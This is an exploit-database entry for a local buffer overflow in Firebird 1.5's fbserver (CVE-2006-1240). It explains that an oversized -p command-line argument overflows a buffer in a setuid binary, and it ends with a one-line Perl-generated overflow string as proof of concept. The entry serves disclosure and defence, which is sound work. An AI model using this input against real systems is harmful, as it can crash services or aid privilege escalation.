Firebird 1.5 - Inet_Server Local Buffer Overflow



EKU-ID: 32703 CVE: CVE-2006-1240;OSVDB-24317 OSVDB-ID:
Author: Joxean Koret Published: 2006-03-13 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


source: https://www.securityfocus.com/bid/17077/info

Firebird is susceptible to a local buffer-overflow vulnerability. This issue is due to the application's failure to properly check boundaries of user-supplied command-line argument data before copying it to an insufficiently sized memory buffer.

Attackers may exploit this issue to execute arbitrary machine code with elevated privileges, because the affected binaries are often installed with setuid privileges.

./fbserver -p `perl -e 'print "a"x155;'`1234